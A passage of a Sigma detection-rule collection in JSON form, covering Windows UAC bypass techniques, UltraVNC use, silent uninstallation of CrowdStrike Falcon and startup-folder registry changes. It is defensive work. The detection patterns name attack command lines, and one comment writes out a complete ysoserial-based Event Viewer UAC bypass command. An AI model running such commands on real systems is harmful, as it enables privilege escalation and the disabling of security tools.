    "content": "title: UAC Bypass Using Disk Cleanup\nid: b697e69c-746f-4a86-9f59-7bfff8eab881\nstatus: test\ndescription: Detects the pattern of UAC Bypass using scheduled tasks and variable expansion of cleanmgr.exe (UACMe 34)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-30\nmodified: 2024-12-01\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|endswith: '\"\\system32\\cleanmgr.exe /autoclean /d C:'\n        ParentCommandLine: 'C:\\Windows\\system32\\svchost.exe -k netsvcs -p -s Schedule'\n        IntegrityLevel:\n            - 'High'\n            - 'System'\n            - 'S-1-16-16384' # System\n            - 'S-1-16-12288' # High\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp.yml",
    "content": "title: Bypass UAC via CMSTP\nid: e66779cc-383e-4224-a3a4-267eeb585c40\nstatus: test\ndescription: Detect commandline usage of Microsoft Connection Manager Profile Installer (cmstp.exe) to install specially formatted local .INF files\nreferences:\n    - https://eqllib.readthedocs.io/en/latest/analytics/e584f1a1-c303-4885-8a66-21360c90995b.html\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.003/T1218.003.md\n    - https://lolbas-project.github.io/lolbas/Binaries/Cmstp/\nauthor: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community\ndate: 2019-10-24\nmodified: 2022-08-30\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1548.002\n    - attack.t1218.003\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith: '\\cmstp.exe'\n        - OriginalFileName: 'CMSTP.EXE'\n    selection_cli:\n        CommandLine|contains:\n            - '/s'\n            - '-s'\n            - '/au'\n            - '-au'\n            - '/ni'\n            - '-ni'\n    condition: all of selection*\nfalsepositives:\n    - Legitimate use of cmstp.exe utility by legitimate user\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_cmstp_com_object_access.yml",
    "content": "title: CMSTP UAC Bypass via COM Object Access\nid: 4b60e6f2-bf39-47b4-b4ea-398e33cfe253\nstatus: stable\ndescription: Detects UAC Bypass Attempt Using Microsoft Connection Manager Profile Installer Autoelevate-capable COM Objects (e.g. UACMe ID of 41, 43, 58 or 65)\nreferences:\n    - https://web.archive.org/web/20190720093911/http://www.endurant.io/cmstp/detecting-cmstp-enabled-code-execution-and-uac-bypass-with-sysmon/\n    - https://twitter.com/hFireF0X/status/897640081053364225\n    - https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf\n    - https://github.com/hfiref0x/UACME\nauthor: Nik Seetharaman, Christian Burkard (Nextron Systems)\ndate: 2019-07-31\nmodified: 2024-12-01\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\n    - attack.t1218.003\n    - attack.g0069\n    - car.2019-04-001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\DllHost.exe'\n        ParentCommandLine|contains:\n            - ' /Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}' # cmstplua.dll\n            - ' /Processid:{3E000D72-A845-4CD9-BD83-80C07C3B881F}' # CMLUAUTIL\n            - ' /Processid:{BD54C901-076B-434E-B6C7-17C531F4AB41}' # EditionUpgradeManagerObj.dll\n            - ' /Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}' # colorui.dll\n            - ' /Processid:{E9495B87-D950-4AB5-87A5-FF6D70BF3E90}' # wscui.cpl\n        IntegrityLevel:\n            - 'High'\n            - 'System'\n            - 'S-1-16-16384' # System\n            - 'S-1-16-12288' # High\n    condition: selection\nfalsepositives:\n    - Legitimate CMSTP use (unlikely in modern enterprise environments)\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_computerdefaults.yml",
    "content": "title: UAC Bypass Tools Using ComputerDefaults\nid: 3c05e90d-7eba-4324-9972-5d7f711a60a8\nstatus: test\ndescription: Detects tools such as UACMe used to bypass UAC with computerdefaults.exe (UACMe 59)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-31\nmodified: 2024-12-01\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        IntegrityLevel:\n            - 'High'\n            - 'System'\n            - 'S-1-16-16384' # System\n            - 'S-1-16-12288' # High\n        Image: 'C:\\Windows\\System32\\ComputerDefaults.exe'\n    filter:\n        ParentImage|contains:\n            - ':\\Windows\\System32'\n            - ':\\Program Files'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_consent_comctl32.yml",
    "content": "title: UAC Bypass Using Consent and Comctl32 - Process\nid: 1ca6bd18-0ba0-44ca-851c-92ed89a61085\nstatus: test\ndescription: Detects the pattern of UAC Bypass using consent.exe and comctl32.dll (UACMe 22)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-23\nmodified: 2024-12-01\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\consent.exe'\n        Image|endswith: '\\werfault.exe'\n        IntegrityLevel:\n            - 'High'\n            - 'System'\n            - 'S-1-16-16384' # System\n            - 'S-1-16-12288' # High\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_dismhost.yml",
    "content": "title: UAC Bypass Using DismHost\nid: 853e74f9-9392-4935-ad3b-2e8c040dae86\nstatus: test\ndescription: Detects the pattern of UAC Bypass using DismHost DLL hijacking (UACMe 63)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-30\nmodified: 2024-12-01\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|contains|all:\n            - 'C:\\Users\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\DismHost.exe'\n        IntegrityLevel:\n            - 'High'\n            - 'System'\n            - 'S-1-16-16384' # System\n            - 'S-1-16-12288' # High\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_eventvwr_recentviews.yml",
    "content": "title: UAC Bypass Using Event Viewer RecentViews\nid: 30fc8de7-d833-40c4-96b6-28319fbc4f6c\nrelated:\n    - id: 63e4f530-65dc-49cc-8f80-ccfa95c69d43\n      type: similar\nstatus: test\ndescription: Detects the pattern of UAC Bypass using Event Viewer RecentViews\nreferences:\n    - https://twitter.com/orange_8361/status/1518970259868626944\n    - https://lolbas-project.github.io/lolbas/Binaries/Eventvwr/#execute\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-11-22\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_path:\n        # Example: ysoserial.exe -o raw -f BinaryFormatter - g DataSet -c calc > RecentViews & copy RecentViews %LOCALAPPDATA%\\Microsoft\\EventV~1\\RecentViews & eventvwr.exe\n        CommandLine|contains:\n            - '\\Event Viewer\\RecentViews'\n            - '\\EventV~1\\RecentViews'\n    selection_redirect:\n        CommandLine|contains: '>'\n    condition: all of selection_*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_fodhelper.yml",
    "content": "title: Bypass UAC via Fodhelper.exe\nid: 7f741dcf-fc22-4759-87b4-9ae8376676a2\nstatus: test\ndescription: Identifies use of Fodhelper.exe to bypass User Account Control. Adversaries use this technique to execute privileged processes.\nreferences:\n    - https://eqllib.readthedocs.io/en/latest/analytics/e491ce22-792f-11e9-8f5c-d46d6d62a49e.html\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1548.002/T1548.002.md\nauthor: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community\ndate: 2019-10-24\nmodified: 2021-11-27\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\fodhelper.exe'\n    condition: selection\nfalsepositives:\n    - Legitimate use of fodhelper.exe utility by legitimate user\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_hijacking_firwall_snap_in.yml",
    "content": "title: UAC Bypass via Windows Firewall Snap-In Hijack\nid: e52cb31c-10ed-4aea-bcb7-593c9f4a315b\nstatus: test\ndescription: Detects attempts to bypass User Account Control (UAC) by hijacking the Microsoft Management Console (MMC) Windows Firewall snap-in\nreferences:\n    - https://www.elastic.co/guide/en/security/current/uac-bypass-via-windows-firewall-snap-in-hijack.html#uac-bypass-via-windows-firewall-snap-in-hijack\nauthor: Tim Rauch, Elastic (idea)\ndate: 2022-09-27\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\mmc.exe'\n        ParentCommandLine|contains: 'WF.msc'\n    filter:\n        Image|endswith: '\\WerFault.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_icmluautil.yml",
    "content": "title: UAC Bypass via ICMLuaUtil\nid: 49f2f17b-b4c8-4172-a68b-d5bf95d05130\nstatus: test\ndescription: Detects the pattern of UAC Bypass using ICMLuaUtil Elevated COM interface\nreferences:\n    - https://www.elastic.co/guide/en/security/current/uac-bypass-via-icmluautil-elevated-com-interface.html\nauthor: Florian Roth (Nextron Systems), Elastic (idea)\ndate: 2022-09-13\nmodified: 2022-09-27\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\dllhost.exe'\n        ParentCommandLine|contains:\n            - '/Processid:{3E5FC7F9-9A51-4367-9063-A120244FBEC7}'\n            - '/Processid:{D2E7041B-2927-42FB-8E9F-7CE93B6DC937}'\n    filter:\n        - Image|endswith: '\\WerFault.exe'\n        - OriginalFileName: 'WerFault.exe'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_idiagnostic_profile.yml",
    "content": "title: UAC Bypass Using IDiagnostic Profile\nid: 4cbef972-f347-4170-b62a-8253f6168e6d\nstatus: test\ndescription: Detects the \"IDiagnosticProfileUAC\" UAC bypass technique\nreferences:\n    - https://github.com/Wh04m1001/IDiagnosticProfileUAC\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2022-07-03\nmodified: 2024-12-01\ntags:\n    - attack.execution\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\DllHost.exe'\n        ParentCommandLine|contains: ' /Processid:{12C21EA7-2EB8-4B55-9249-AC243DA8C666}'\n        IntegrityLevel:\n            - 'High'\n            - 'System'\n            - 'S-1-16-16384' # System\n            - 'S-1-16-12288' # High\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_ieinstal.yml",
    "content": "title: UAC Bypass Using IEInstal - Process\nid: 80fc36aa-945e-4181-89f2-2f907ab6775d\nstatus: test\ndescription: Detects the pattern of UAC Bypass using IEInstal.exe (UACMe 64)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-30\nmodified: 2024-12-01\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        IntegrityLevel:\n            - 'High'\n            - 'System'\n            - 'S-1-16-16384' # System\n            - 'S-1-16-12288' # High\n        ParentImage|endswith: '\\ieinstal.exe'\n        Image|contains: '\\AppData\\Local\\Temp\\'\n        Image|endswith: 'consent.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_msconfig_gui.yml",
    "content": "title: UAC Bypass Using MSConfig Token Modification - Process\nid: ad92e3f9-7eb6-460e-96b1-582b0ccbb980\nstatus: test\ndescription: Detects the pattern of UAC Bypass using a msconfig GUI hack (UACMe 55)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-30\nmodified: 2024-12-01\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        IntegrityLevel:\n            - 'High'\n            - 'System'\n            - 'S-1-16-16384' # System\n            - 'S-1-16-12288' # High\n        ParentImage|endswith: '\\AppData\\Local\\Temp\\pkgmgr.exe'\n        CommandLine: '\"C:\\Windows\\system32\\msconfig.exe\" -5'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_ntfs_reparse_point.yml",
    "content": "title: UAC Bypass Using NTFS Reparse Point - Process\nid: 39ed3c80-e6a1-431b-9df3-911ac53d08a7\nstatus: test\ndescription: Detects the pattern of UAC Bypass using NTFS reparse point and wusa.exe DLL hijacking (UACMe 36)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-30\nmodified: 2024-12-01\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection1:\n        CommandLine|startswith: '\"C:\\Windows\\system32\\wusa.exe\"  /quiet C:\\Users\\'\n        CommandLine|endswith: '\\AppData\\Local\\Temp\\update.msu'\n        IntegrityLevel:\n            - 'High'\n            - 'System'\n            - 'S-1-16-16384' # System\n            - 'S-1-16-12288' # High\n    selection2:\n        ParentCommandLine: '\"C:\\Windows\\system32\\dism.exe\" /online /quiet /norestart /add-package /packagepath:\"C:\\Windows\\system32\\pe386\" /ignorecheck'\n        IntegrityLevel:\n            - 'High'\n            - 'System'\n        CommandLine|contains|all:\n            - 'C:\\Users\\'\n            - '\\AppData\\Local\\Temp\\'\n            - '\\dismhost.exe {'\n        Image|endswith: '\\DismHost.exe'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_pkgmgr_dism.yml",
    "content": "title: UAC Bypass Using PkgMgr and DISM\nid: a743ceba-c771-4d75-97eb-8a90f7f4844c\nstatus: test\ndescription: Detects the pattern of UAC Bypass using pkgmgr.exe and dism.exe (UACMe 23)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-23\nmodified: 2024-12-01\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\pkgmgr.exe'\n        Image|endswith: '\\dism.exe'\n        IntegrityLevel:\n            - 'High'\n            - 'System'\n            - 'S-1-16-16384' # System\n            - 'S-1-16-12288' # High\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_sdclt.yml",
    "content": "title: Potential UAC Bypass Via Sdclt.EXE\nid: 40f9af16-589d-4984-b78d-8c2aec023197\nstatus: test\ndescription: A General detection for sdclt being spawned as an elevated process. This could be an indicator of sdclt being used for bypass UAC techniques.\nreferences:\n    - https://github.com/OTRF/detection-hackathon-apt29/issues/6\n    - https://github.com/OTRF/ThreatHunter-Playbook/blob/2d4257f630f4c9770f78d0c1df059f891ffc3fec/docs/evals/apt29/detections/3.B.2_C36B49B5-DF58-4A34-9FE9-56189B9DEFEA.md\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2020-05-02\nmodified: 2024-12-01\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: 'sdclt.exe'\n        IntegrityLevel:\n            - 'High'\n            - 'S-1-16-12288' # High\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_trustedpath.yml",
    "content": "title: TrustedPath UAC Bypass Pattern\nid: 4ac47ed3-44c2-4b1f-9d51-bf46e8914126\nrelated:\n    - id: 0cbe38c0-270c-41d9-ab79-6e5a9a669290\n      type: similar\nstatus: test\ndescription: Detects indicators of a UAC bypass method by mocking directories\nreferences:\n    - https://medium.com/tenable-techblog/uac-bypass-by-mocking-trusted-directories-24a96675f6e\n    - https://www.wietzebeukema.nl/blog/hijacking-dlls-in-windows\n    - https://github.com/netero1010/TrustedPath-UACBypass-BOF\n    - https://x.com/Wietze/status/1933495426952421843\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-08-27\nmodified: 2025-06-17\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|contains:\n            - 'C:\\Windows \\System32\\'\n            - 'C:\\Windows \\SysWOW64\\'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_winsat.yml",
    "content": "title: UAC Bypass Abusing Winsat Path Parsing - Process\nid: 7a01183d-71a2-46ad-ad5c-acd989ac1793\nstatus: test\ndescription: Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-30\nmodified: 2024-12-01\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        IntegrityLevel:\n            - 'High'\n            - 'System'\n            - 'S-1-16-16384' # System\n            - 'S-1-16-12288' # High\n        ParentImage|endswith: '\\AppData\\Local\\Temp\\system32\\winsat.exe'\n        ParentCommandLine|contains: 'C:\\Windows \\system32\\winsat.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_wmp.yml",
    "content": "title: UAC Bypass Using Windows Media Player - Process\nid: 0058b9e5-bcd7-40d4-9205-95ca5a16d7b2\nstatus: test\ndescription: Detects the pattern of UAC Bypass using Windows Media Player osksupport.dll (UACMe 32)\nreferences:\n    - https://github.com/hfiref0x/UACME\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-23\nmodified: 2024-12-01\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img_1:\n        Image: 'C:\\Program Files\\Windows Media Player\\osk.exe'\n    selection_img_2:\n        Image: 'C:\\Windows\\System32\\cmd.exe'\n        ParentCommandLine: '\"C:\\Windows\\system32\\mmc.exe\" \"C:\\Windows\\system32\\eventvwr.msc\" /s'\n    selection_integrity:\n        IntegrityLevel:\n            - 'High'\n            - 'System'\n            - 'S-1-16-16384' # System\n            - 'S-1-16-12288' # High\n    condition: 1 of selection_img_* and selection_integrity\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset.yml",
    "content": "title: Bypass UAC via WSReset.exe\nid: d797268e-28a9-49a7-b9a8-2f5039011c5c\nrelated:\n    - id: bdc8918e-a1d5-49d1-9db7-ea0fd91aa2ae\n      type: obsolete\nstatus: test\ndescription: Detects use of WSReset.exe to bypass User Account Control (UAC). Adversaries use this technique to execute privileged processes.\nreferences:\n    - https://eqllib.readthedocs.io/en/latest/analytics/532b5ed4-7930-11e9-8f5c-d46d6d62a49e.html\n    - https://lolbas-project.github.io/lolbas/Binaries/Wsreset/\n    - https://www.activecyber.us/activelabs/windows-uac-bypass\n    - https://twitter.com/ReaQta/status/1222548288731217921\nauthor: E.M. Anhaus (originally from Atomic Blue Detections, Tony Lambert), oscd.community, Florian Roth\ndate: 2019-10-24\nmodified: 2022-05-13\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\wsreset.exe'\n    filter:\n        - Image|endswith: '\\conhost.exe'\n        - OriginalFileName: 'CONHOST.EXE'\n    condition: selection and not filter\nfalsepositives:\n    - Unknown sub processes of Wsreset.exe\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uac_bypass_wsreset_integrity_level.yml",
    "content": "title: UAC Bypass WSReset\nid: 89a9a0e0-f61a-42e5-8957-b1479565a658\nstatus: test\ndescription: Detects the pattern of UAC Bypass via WSReset usable by default sysmon-config\nreferences:\n    - https://lolbas-project.github.io/lolbas/Binaries/Wsreset/\n    - https://github.com/hfiref0x/UACME\n    - https://medium.com/falconforce/falconfriday-detecting-uac-bypasses-0xff16-86c2a9107abf\nauthor: Christian Burkard (Nextron Systems)\ndate: 2021-08-23\nmodified: 2024-12-01\ntags:\n    - attack.defense-evasion\n    - attack.privilege-escalation\n    - attack.t1548.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\wsreset.exe'\n        IntegrityLevel:\n            - 'High'\n            - 'System'\n            - 'S-1-16-16384' # System\n            - 'S-1-16-12288' # High\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_ultravnc.yml",
    "content": "title: Use of UltraVNC Remote Access Software\nid: 145322e4-0fd3-486b-81ca-9addc75736d8\nstatus: test\ndescription: An adversary may use legitimate desktop support and remote access software,to establish an interactive command and control channel to target systems within networks\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/9e5b12c4912c07562aec7500447b11fa3e17e254/atomics/T1219/T1219.md\nauthor: frack113\ndate: 2022-10-02\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        - Description: VNCViewer\n        - Product: UltraVNC VNCViewer\n        - Company: UltraVNC\n        - OriginalFileName: VNCViewer.exe\n    condition: selection\nfalsepositives:\n    - Legitimate use\nlevel: medium\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_ultravnc_susp_execution.yml",
    "content": "title: Suspicious UltraVNC Execution\nid: 871b9555-69ca-4993-99d3-35a59f9f3599\nstatus: test\ndescription: Detects suspicious UltraVNC command line flag combination that indicate a auto reconnect upon execution, e.g. startup (as seen being used by Gamaredon threat group)\nreferences:\n    - https://web.archive.org/web/20220224045756/https://www.ria.ee/sites/default/files/content-editors/kuberturve/tale_of_gamaredon_infection.pdf\n    - https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-gamaredon-espionage-ukraine\n    - https://unit42.paloaltonetworks.com/unit-42-title-gamaredon-group-toolset-evolution\n    - https://uvnc.com/docs/uvnc-viewer/52-ultravnc-viewer-commandline-parameters.html\nauthor: Bhabesh Raj\ndate: 2022-03-04\nmodified: 2022-03-09\ntags:\n    - attack.lateral-movement\n    - attack.g0047\n    - attack.t1021.005\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '-autoreconnect '\n            - '-connect '\n            - '-id:'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_uninstall_crowdstrike_falcon.yml",
    "content": "title: Uninstall Crowdstrike Falcon Sensor\nid: f0f7be61-9cf5-43be-9836-99d6ef448a18\nstatus: test\ndescription: Adversaries may disable security tools to avoid possible detection of their tools and activities by uninstalling Crowdstrike Falcon\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md\nauthor: frack113\ndate: 2021-07-12\nmodified: 2023-03-09\ntags:\n    - attack.defense-evasion\n    - attack.t1562.001\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        CommandLine|contains|all:\n            - '\\WindowsSensor.exe'\n            - ' /uninstall'\n            - ' /quiet'\n    condition: selection\nfalsepositives:\n    - Administrator might leverage the same command line for debugging or other purposes. However this action must be always investigated\nlevel: high\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_user_shell_folders_registry_modification.yml",
    "content": "title: User Shell Folders Registry Modification via CommandLine\nid: 8f3ab69a-aa22-4943-aa58-e0a52fdf6818\nrelated:\n    - id: 9c226817-8dc9-46c2-a58d-66655aafd7dc\n      type: similar\nstatus: experimental\ndescription: |\n    Detects modifications to User Shell Folders registry values via reg.exe or PowerShell, which could indicate persistence attempts.\n    Attackers may modify User Shell Folders registry values to point to malicious executables or scripts that will be executed during startup.\n    This technique is often used to maintain persistence on a compromised system by ensuring that malicious payloads are executed automatically.\nreferences:\n    - https://www.welivesecurity.com/en/eset-research/muddywater-snakes-riverbank/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2026-01-05\ntags:\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1547.001\n    - attack.defense-evasion\n    - attack.t1112\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection_img:\n        - Image|endswith:\n              - '\\powershell.exe'\n              - '\\pwsh.exe'\n              - '\\reg.exe'\n        - OriginalFileName:\n              - 'powershell.exe'\n              - 'pwsh.dll'\n              - 'reg.exe'\n    selection_cli_action:\n        CommandLine|contains:\n            - ' add ' # reg.exe modification\n            - 'New-ItemProperty'\n            - 'Set-ItemProperty'\n            - 'si ' # short for Set-ItemProperty\n    selection_cli_paths_root:\n        CommandLine|contains:\n            - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders'\n            - '\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders'\n    selection_cli_paths_suffix:\n        CommandLine|contains: 'Startup' # covers both 'Startup' and 'Common Startup'\n    condition: all of selection_*\nfalsepositives:\n    - Usage of reg.exe or PowerShell to modify User Shell Folders for legitimate purposes; but rare.\nlevel: high\nregression_tests_path: regression_data/rules/windows/process_creation/proc_creation_win_user_shell_folders_registry_modification/info.yml\nsimulation:\n    - type: atomic-red-team\n      name: Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value\n      technique: T1547.001\n      atomic_guid: acfef903-7662-447e-a391-9c91c2f00f7b\n"
  },
  {
    "path": "rules/windows/process_creation/proc_creation_win_userinit_uncommon_child_processes.yml",
    "content": "title: Uncommon Userinit Child Process\nid: 0a98a10c-685d-4ab0-bddc-b6bdd1d48458\nrelated:\n    - id: 21d856f9-9281-4ded-9377-51a1a6e2a432\n      type: similar\nstatus: test\ndescription: Detects uncommon \"userinit.exe\" child processes, which could be a sign of uncommon shells or login scripts used for persistence.\nreferences:\n    - https://cocomelonc.github.io/persistence/2022/12/09/malware-pers-20.html\n    - https://learn.microsoft.com/en-us/windows-server/administration/server-core/server-core-sconfig#powershell-is-the-default-shell-on-server-core\nauthor: Tom Ueltschi (@c_APT_ure), Tim Shelton\ndate: 2019-01-12\nmodified: 2023-11-14\ntags:\n    - attack.privilege-escalation\n    - attack.t1037.001\n    - attack.persistence\nlogsource:\n    category: process_creation\n    product: windows\ndetection:\n    selection:\n        ParentImage|endswith: '\\userinit.exe'\n    filter_main_explorer:\n        Image|endswith: ':\\WINDOWS\\explorer.exe'\n    filter_optional_logonscripts:\n        CommandLine|contains:\n            - 'netlogon.bat'\n            - 'UsrLogon.cmd'\n    filter_optional_windows_core:\n        # Note: This filter is mandatory on Windows Core machines as the default shell spawned by \"userinit\" is \"powershell.exe\".\n        # https://learn.microsoft.com/en-us/windows-server/administration/server-core/server-core-sconfig#powershell-is-the-default-shell-on-server-core\n        CommandLine: 'PowerShell.exe'\n    filter_optional_proquota:\n        Image|endswith:\n            - ':\\Windows\\System32\\proquota.exe'\n            - ':\\Windows\\SysWOW64\\proquota.exe'\n    filter_optional_citrix:\n        Image|endswith:\n            # As reported by https://github.com/SigmaHQ/sigma/issues/4569\n            - ':\\Program Files (x86)\\Citrix\\HDX\\bin\\cmstart.exe' # https://support.citrix.com/article/CTX983798/purpose-of-cmstart-command\n            - ':\\Program Files (x86)\\Citrix\\HDX\\bin\\icast.exe' # 